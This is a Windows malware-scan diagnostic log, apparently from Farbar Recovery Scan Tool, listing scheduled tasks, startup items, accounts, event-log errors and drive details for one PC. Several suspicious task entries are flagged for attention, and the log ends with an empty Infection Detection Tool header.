CustomCLSID: HKU\S-1-5-21-3959093455-1914111138-4206043169-1001_Classes\CLSID\{F241C880-6982-4CE5-8CF7-7085BA96DA5A}\InprocServer32 -> C:\Users\georgepc\AppData\Local\Microsoft\SkyDrive\17.3.1171.0714\amd64\SkyDriveShell64.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-3959093455-1914111138-4206043169-1001_Classes\CLSID\{F8071786-1FD0-4A66-81A1-3CBE29274458}\InprocServer32 -> C:\Users\georgepc\AppData\Local\Microsoft\SkyDrive\17.3.1171.0714\amd64\FileSyncApi64.dll (Microsoft Corporation)
==================== Restore Points =========================
06-01-2015 16:46:09 Scheduled Checkpoint
==================== Hosts content: ==========================
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
2009-07-13 18:34 - 2009-06-10 13:00 - 00000824 ____A C:\Windows\system32\Drivers\etc\hosts
==================== Scheduled Tasks (whitelisted) =============
(If an entry is included in the fixlist, it will be removed from registry. Any associated file could be listed separately to be moved.)
Task: {02E4327D-8276-4DF4-9950-2ACA3F910C02} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2014-07-23] (Google Inc.)
Task: {2AED3F10-5CCF-42B3-8D6C-AB78C7B3CAFF} - System32\Tasks\dvwgmok => C:\Users\georgepc\AppData\Local\Temp\spgcdak.exe <==== ATTENTION
Task: {3FAA4E53-36FB-406A-97F0-F5C056C1A125} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2014-07-23] (Google Inc.)
Task: {424F2418-3CE7-46FD-BAC1-DE3B79F6AFBA} - System32\Tasks\Microsoft\Office\Office Subscription Maintenance => C:\Program Files\Microsoft Office 15\root\vfs\ProgramFilesCommonx86\Microsoft Shared\OFFICE15\OLicenseHeartbeat.exe [2014-11-11] (Microsoft Corporation)
Task: {49D42AE4-7E9B-468D-B927-6A9B7E97F311} - System32\Tasks\Microsoft Office 15 Sync Maintenance for GeorgePan-PC-georgepc GeorgePan-PC => C:\Program Files\Microsoft Office 15\Root\Office15\MsoSync.exe [2014-11-04] (Microsoft Corporation)
Task: {5357BD43-1F7F-4064-A44E-6E17F04857DA} - System32\Tasks\Microsoft\Office\Office Automatic Updates => C:\Program Files\Microsoft Office 15\ClientX64\OfficeC2RClient.exe [2014-11-04] (Microsoft Corporation)
Task: {6CBACCAD-195E-40FC-83A3-930A5DAA7BD8} - System32\Tasks\IUM-F1E24CA0-B63E-4F13-A9E3-4ADE3BFF3473 => C:\Program Files (x86)\Intel\Intel® Update Manager\bin\iumsvc.exe [2014-01-17] ()
Task: {72DBB58A-C0A2-49F8-A755-6FE7A9A2FF47} - System32\Tasks\G2MUpdateTask-S-1-5-21-3959093455-1914111138-4206043169-1001 => C:\Users\georgepc\AppData\Local\Citrix\GoToMeeting\2130\g2mupdate.exe [2014-12-21] (Citrix Online, a division of Citrix Systems, Inc.)
Task: {C16CD23B-3616-4B8D-88C8-CFAE033F2CF7} - System32\Tasks\OfficeSoftwareProtectionPlatform\SvcRestartTask => Sc.exe start osppsvc
Task: {DE8240FD-BA3C-48D6-9375-DF6775FBA7AA} - System32\Tasks\Security Center Update - 3401159158 => C:\Users\georgepc\AppData\Roaming\Siegazsi\kaxynek.exe <==== ATTENTION
Task: {E5058AA4-D140-4DCC-9FB8-05A2BC093850} - System32\Tasks\IUM-F1E24CA0-B63E-4F13-A9E3-4ADE3BFF3473-Logon => C:\Program Files (x86)\Intel\Intel® Update Manager\bin\iumsvc.exe [2014-01-17] ()
Task: {EF1E168D-5FDB-400A-9F32-34F2B03901CB} - System32\Tasks\0614aUpdateInfo => C:\ProgramData\Avg_Update_0614a\0614a_AVG-Secure-Search-Update.exe [2014-06-19] ()
Task: {FFFC73B7-4DDD-4A6B-87AE-6F90D21D9DF9} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2014-12-19] (Adobe Systems Incorporated)
Task: C:\Windows\Tasks\0614aUpdateInfo.job => C:\ProgramData\Avg_Update_0614a\0614a_AVG-Secure-Search-Update.exe
Task: C:\Windows\Tasks\G2MUpdateTask-S-1-5-21-3959093455-1914111138-4206043169-1001.job => C:\Users\georgepc\AppData\Local\Citrix\GoToMeeting\2130\g2mupdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\Security Center Update - 3401159158.job => C:\Users\georgepc\AppData\Roaming\Siegazsi\kaxynek.exe <==== ATTENTION
==================== Loaded Modules (whitelisted) =============
2014-06-03 17:20 - 2014-01-07 16:48 - 00117536 _____ () C:\Program Files\NVIDIA Corporation\Display\NvSmartMax64.dll
2014-08-02 13:47 - 2014-05-20 08:19 - 00105640 _____ () C:\Program Files\Microsoft Office 15\ClientX64\ApiClient.dll
2014-10-24 02:11 - 2014-09-23 05:36 - 08897696 _____ () C:\Program Files\Microsoft Office 15\root\VFS\ProgramFilesX64\Microsoft Office\Office15\1033\GrooveIntlResource.dll
2014-02-19 15:51 - 2014-02-19 15:51 - 01241560 _____ () C:\Program Files (x86)\Intel\Intel® Management Engine Components\LMS\ACE.dll
2013-11-02 21:19 - 2006-03-17 16:56 - 00290816 _____ () \\DG4F5WV1\WINCSI\CSA\vc6-re200l.dll
2015-01-06 14:55 - 2013-11-14 18:13 - 00081920 _____ () C:\Users\georgepc\AppData\Local\Temp\FileCabinet_CS\cs_20150106_145507\EN-US\cscabsv.dll.mui
2015-01-06 14:55 - 2013-11-14 17:43 - 00881152 _____ () C:\Users\georgepc\AppData\Local\temp\FileCabinet_CS\cs_20150106_145507\fc_condll.dll
2015-01-06 14:55 - 2013-11-14 17:43 - 00266240 _____ () C:\Users\georgepc\AppData\Local\temp\FileCabinet_CS\cs_20150106_145507\en-US\fc_condll.dll.mui
2013-11-02 21:19 - 2010-03-16 08:40 - 01063424 _____ () \\DG4F5WV1\WinCSI\CSA\Wcis_c.dll
2013-11-02 21:18 - 2008-11-13 12:59 - 00995328 _____ () \\DG4F5WV1\WINCSI\CSA\condll.dll
2014-09-21 04:27 - 2014-11-23 06:53 - 00316576 _____ () C:\Program Files\Microsoft Office 15\root\office15\AppVIsvStream32.dll
2014-09-21 04:27 - 2014-11-23 06:53 - 00316576 _____ () C:\Program Files\Microsoft Office 15\Root\Office15\AppVIsvStream32.dll
2015-01-06 15:39 - 2013-11-14 18:18 - 00009728 _____ () C:\Users\georgepc\AppData\Local\Temp\FileCabinet_CS_Addin\cs_20150106_153914\EN-US\cab_addin.dll.mui
==================== Alternate Data Streams (whitelisted) =========
(If an entry is included in the fixlist, only the Alternate Data Streams will be removed.)
==================== Safe Mode (whitelisted) ===================
(If an item is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\mcpltsvc => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\GoToAssist Remote Support Customer => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mcpltsvc => ""=""
==================== EXE Association (whitelisted) =============
(If an entry is included in the fixlist, the default will be restored. None default entries will be removed.)
==================== MSCONFIG/TASK MANAGER disabled items =========
(Currently there is no automatic fix for this section.)
MSCONFIG\startupfolder: C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^CS Connect Background Services.lnk => C:\Windows\pss\CS Connect Background Services.lnk.CommonStartup
MSCONFIG\startupreg: AthBtTray => "C:\Program Files (x86)\Dell Wireless\Bluetooth Suite\athbttray.exe"
MSCONFIG\startupreg: AtherosBtStack => "C:\Program Files (x86)\Dell Wireless\Bluetooth Suite\btvstack.exe"
MSCONFIG\startupreg: IAStorIcon => "C:\Program Files\Intel\Intel® Rapid Storage Technology\IAStorIconLaunch.exe" "C:\Program Files\Intel\Intel® Rapid Storage Technology\IAStorIcon.exe" 60
MSCONFIG\startupreg: kenxoil => rundll32 "C:\Users\georgepc\AppData\Local\kenxoil.dll",kenxoil
MSCONFIG\startupreg: LogMeIn GUI => "C:\Program Files (x86)\LogMeIn\x64\LogMeInSystray.exe"
MSCONFIG\startupreg: RtHDVBg => "C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe" /MAXX5REC
MSCONFIG\startupreg: RTHDVCPL => "C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe" -s
MSCONFIG\startupreg: swg => "C:\Program Files (x86)\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe"
MSCONFIG\startupreg: USB3MON => "C:\Program Files (x86)\Intel\Intel® USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe"
========================= Accounts: ==========================
Administrator (S-1-5-21-3959093455-1914111138-4206043169-500 - Administrator - Enabled) => C:\Users\Administrator
GeorgePan (S-1-5-21-3959093455-1914111138-4206043169-1000 - Administrator - Disabled) => C:\Users\GeorgePan
georgepc (S-1-5-21-3959093455-1914111138-4206043169-1001 - Administrator - Enabled) => C:\Users\georgepc
Guest (S-1-5-21-3959093455-1914111138-4206043169-501 - Limited - Disabled)
==================== Faulty Device Manager Devices =============
Name: Dell Wireless 1703 802.11b/g/n (2.4GHz)
Description: Dell Wireless 1703 802.11b/g/n (2.4GHz)
Class Guid: {4d36e972-e325-11ce-bfc1-08002be10318}
Manufacturer: Atheros Communications Inc.
Service: athr
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.
Name: Dell Wireless 1703 Bluetooth
Description: Dell Wireless 1703 Bluetooth
Class Guid: {e0cbf06c-cd8b-4647-bb8a-263b43f0f974}
Manufacturer: Atheros Communications
Service: BTHUSB
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.
==================== Event log errors: =========================
Application errors:
==================
Error: (01/07/2015 00:12:10 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 11.0.9600.17496, time stamp: 0x4a5bc96f
Faulting module name: MSHTML.dll, version: 11.0.9600.17496, time stamp: 0x546ff2f9
Exception code: 0xc00000fd
Fault offset: 0x0040b56c
Faulting process id: 0x22f4
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3
Error: (01/07/2015 11:53:14 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: 5BDD.tmp, version: 0.0.0.0, time stamp: 0x54abbc39
Faulting module name: 5BDD.tmp, version: 0.0.0.0, time stamp: 0x54abbc39
Exception code: 0xc0000005
Fault offset: 0x00001509
Faulting process id: 0x3b48
Faulting application start time: 0x5BDD.tmp0
Faulting application path: 5BDD.tmp1
Faulting module path: 5BDD.tmp2
Report Id: 5BDD.tmp3
Error: (01/07/2015 11:25:54 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: 55F3.tmp, version: 0.0.0.0, time stamp: 0x54abbc39
Faulting module name: 55F3.tmp, version: 0.0.0.0, time stamp: 0x54abbc39
Exception code: 0xc0000005
Fault offset: 0x00001509
Faulting process id: 0x157c
Faulting application start time: 0x55F3.tmp0
Faulting application path: 55F3.tmp1
Faulting module path: 55F3.tmp2
Report Id: 55F3.tmp3
Error: (01/07/2015 10:03:48 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: 150C.tmp, version: 0.0.0.0, time stamp: 0x54abbc39
Faulting module name: 150C.tmp, version: 0.0.0.0, time stamp: 0x54abbc39
Exception code: 0xc0000005
Fault offset: 0x00001509
Faulting process id: 0x3058
Faulting application start time: 0x150C.tmp0
Faulting application path: 150C.tmp1
Faulting module path: 150C.tmp2
Report Id: 150C.tmp3
Error: (01/07/2015 09:44:20 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: 5314.tmp, version: 0.0.0.0, time stamp: 0x54abbc39
Faulting module name: 5314.tmp, version: 0.0.0.0, time stamp: 0x54abbc39
Exception code: 0xc0000005
Fault offset: 0x00001509
Faulting process id: 0x20e0
Faulting application start time: 0x5314.tmp0
Faulting application path: 5314.tmp1
Faulting module path: 5314.tmp2
Report Id: 5314.tmp3
Error: (01/07/2015 06:53:09 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 11.0.9600.17496, time stamp: 0x4ce7a46b
Faulting module name: MSHTML.dll, version: 11.0.9600.17496, time stamp: 0x546ff2f9
Exception code: 0xc00000fd
Fault offset: 0x0011fb5c
Faulting process id: 0x1be4
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3
Error: (01/07/2015 06:13:49 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: 9DD8.tmp, version: 0.0.0.0, time stamp: 0x54986f74
Faulting module name: 9DD8.tmp, version: 0.0.0.0, time stamp: 0x54986f74
Exception code: 0xc0000005
Fault offset: 0x00002496
Faulting process id: 0x34a8
Faulting application start time: 0x9DD8.tmp0
Faulting application path: 9DD8.tmp1
Faulting module path: 9DD8.tmp2
Report Id: 9DD8.tmp3
Error: (01/07/2015 06:13:41 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: 7ED1.tmp, version: 0.0.0.0, time stamp: 0x54986f74
Faulting module name: 7ED1.tmp, version: 0.0.0.0, time stamp: 0x54986f74
Exception code: 0xc0000005
Fault offset: 0x00002496
Faulting process id: 0x36e8
Faulting application start time: 0x7ED1.tmp0
Faulting application path: 7ED1.tmp1
Faulting module path: 7ED1.tmp2
Report Id: 7ED1.tmp3
Error: (01/07/2015 05:51:09 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: DFF2.tmp, version: 0.0.0.0, time stamp: 0x54986f74
Faulting module name: DFF2.tmp, version: 0.0.0.0, time stamp: 0x54986f74
Exception code: 0xc0000005
Fault offset: 0x00002496
Faulting process id: 0x348c
Faulting application start time: 0xDFF2.tmp0
Faulting application path: DFF2.tmp1
Faulting module path: DFF2.tmp2
Report Id: DFF2.tmp3
Error: (01/07/2015 05:51:01 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: BDEF.tmp, version: 0.0.0.0, time stamp: 0x54986f74
Faulting module name: BDEF.tmp, version: 0.0.0.0, time stamp: 0x54986f74
Exception code: 0xc0000005
Fault offset: 0x00002496
Faulting process id: 0x2478
Faulting application start time: 0xBDEF.tmp0
Faulting application path: BDEF.tmp1
Faulting module path: BDEF.tmp2
Report Id: BDEF.tmp3
System errors:
=============
Error: (01/07/2015 01:39:33 PM) (Source: Schannel) (EventID: 4119) (User: NT AUTHORITY)
Description: The following fatal alert was received: 80.
Error: (01/07/2015 01:35:08 PM) (Source: Schannel) (EventID: 4119) (User: NT AUTHORITY)
Description: The following fatal alert was received: 80.
Error: (01/07/2015 01:02:58 PM) (Source: Schannel) (EventID: 4119) (User: NT AUTHORITY)
Description: The following fatal alert was received: 80.
Error: (01/07/2015 00:01:58 PM) (Source: Schannel) (EventID: 4119) (User: NT AUTHORITY)
Description: The following fatal alert was received: 80.
Error: (01/07/2015 00:01:02 PM) (Source: Schannel) (EventID: 4119) (User: NT AUTHORITY)
Description: The following fatal alert was received: 80.
Error: (01/07/2015 11:43:19 AM) (Source: Schannel) (EventID: 4119) (User: NT AUTHORITY)
Description: The following fatal alert was received: 80.
Error: (01/07/2015 11:24:34 AM) (Source: Schannel) (EventID: 4119) (User: NT AUTHORITY)
Description: The following fatal alert was received: 80.
Error: (01/07/2015 11:13:23 AM) (Source: Schannel) (EventID: 4119) (User: NT AUTHORITY)
Description: The following fatal alert was received: 80.
Error: (01/07/2015 11:07:23 AM) (Source: Schannel) (EventID: 4119) (User: NT AUTHORITY)
Description: The following fatal alert was received: 80.
Error: (01/07/2015 10:25:29 AM) (Source: Schannel) (EventID: 4119) (User: NT AUTHORITY)
Description: The following fatal alert was received: 80.
Microsoft Office Sessions:
=========================
Error: (01/07/2015 00:12:10 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: iexplore.exe11.0.9600.174964a5bc96fMSHTML.dll11.0.9600.17496546ff2f9c00000fd0040b56c22f401d02ab5ad96f9e2C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\system32\MSHTML.dll75834fb4-96a9-11e4-a242-3417eba71c52
Error: (01/07/2015 11:53:14 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: 5BDD.tmp0.0.0.054abbc395BDD.tmp0.0.0.054abbc39c0000005000015093b4801d02ab39249a5d3C:\Users\georgepc\AppData\Local\Temp\5BDD.tmpC:\Users\georgepc\AppData\Local\Temp\5BDD.tmpd05a2a7f-96a6-11e4-a242-3417eba71c52
Error: (01/07/2015 11:25:54 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: 55F3.tmp0.0.0.054abbc3955F3.tmp0.0.0.054abbc39c000000500001509157c01d02aafc0d021c6C:\Users\georgepc\AppData\Local\Temp\55F3.tmpC:\Users\georgepc\AppData\Local\Temp\55F3.tmpfed98251-96a2-11e4-a242-3417eba71c52
Error: (01/07/2015 10:03:48 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: 150C.tmp0.0.0.054abbc39150C.tmp0.0.0.054abbc39c000000500001509305801d02aa4481262a0C:\Users\georgepc\AppData\Local\Temp\150C.tmpC:\Users\georgepc\AppData\Local\Temp\150C.tmp86b93fa6-9697-11e4-a242-3417eba71c52
Error: (01/07/2015 09:44:20 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: 5314.tmp0.0.0.054abbc395314.tmp0.0.0.054abbc39c00000050000150920e001d02aa18f9bb08dC:\Users\georgepc\AppData\Local\Temp\5314.tmpC:\Users\georgepc\AppData\Local\Temp\5314.tmpce957c14-9694-11e4-a242-3417eba71c52
Error: (01/07/2015 06:53:09 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: iexplore.exe11.0.9600.174964ce7a46bMSHTML.dll11.0.9600.17496546ff2f9c00000fd0011fb5c1be401d02a896999f715C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\system32\MSHTML.dlle48b86cd-967c-11e4-a242-3417eba71c52
Error: (01/07/2015 06:13:49 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: 9DD8.tmp0.0.0.054986f749DD8.tmp0.0.0.054986f74c00000050000249634a801d02a84282c8f0bC:\Users\georgepc\AppData\Local\Temp\9DD8.tmpC:\Users\georgepc\AppData\Local\Temp\9DD8.tmp65db7b4c-9677-11e4-a242-3417eba71c52
Error: (01/07/2015 06:13:41 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: 7ED1.tmp0.0.0.054986f747ED1.tmp0.0.0.054986f74c00000050000249636e801d02a842341571aC:\Users\georgepc\AppData\Local\Temp\7ED1.tmpC:\Users\georgepc\AppData\Local\Temp\7ED1.tmp6118bac0-9677-11e4-a242-3417eba71c52
Error: (01/07/2015 05:51:09 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: DFF2.tmp0.0.0.054986f74DFF2.tmp0.0.0.054986f74c000000500002496348c01d02a80fddaaa03C:\Users\georgepc\AppData\Local\Temp\DFF2.tmpC:\Users\georgepc\AppData\Local\Temp\DFF2.tmp3b899644-9674-11e4-a242-3417eba71c52
Error: (01/07/2015 05:51:01 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: BDEF.tmp0.0.0.054986f74BDEF.tmp0.0.0.054986f74c000000500002496247801d02a80f8786d45C:\Users\georgepc\AppData\Local\Temp\BDEF.tmpC:\Users\georgepc\AppData\Local\Temp\BDEF.tmp367aa9af-9674-11e4-a242-3417eba71c52
==================== Memory info ===========================
Processor: Intel® Core i7-4790 CPU @ 3.60GHz
Percentage of memory in use: 48%
Total physical RAM: 8143.23 MB
Available physical RAM: 4219.92 MB
Total Pagefile: 16284.63 MB
Available Pagefile: 11587.27 MB
Total Virtual: 8192 MB
Available Virtual: 8191.83 MB
==================== Drives ================================
Drive c: (OS) (Fixed) (Total:907.25 GB) (Free:818.52 GB) NTFS
Drive i: (WDO_MEDIA64) (Removable) (Total:14.89 GB) (Free:14.6 GB) FAT32
==================== MBR & Partition Table ==================
========================================================
Disk: 0 (MBR Code: Windows 7 or Vista) (Size: 931.5 GB) (Disk ID: 0ADE5109)
Partition 1: (Not Active) - (Size=39 MB) - (Type=DE)
Partition 2: (Active) - (Size=24.2 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=907.3 GB) - (Type=07 NTFS)
========================================================
Disk: 5 (MBR Code: Windows 7 or 8) (Size: 14.9 GB) (Disk ID: 00000000)
Partition: GPT Partition Type.
==================== End Of Log ============================
-
-
IDTool log
-
Infection Detection Tool v1.6 - Nathan Scott
--------------------------------------------
Date/Time: 1/7/2015 1:50:30 PM
Operating System: Windows 7
Service Pack: Service Pack 1
Version Number: 6.1
Product Type: Workstation
--------------------------------------------
[Detected Flags]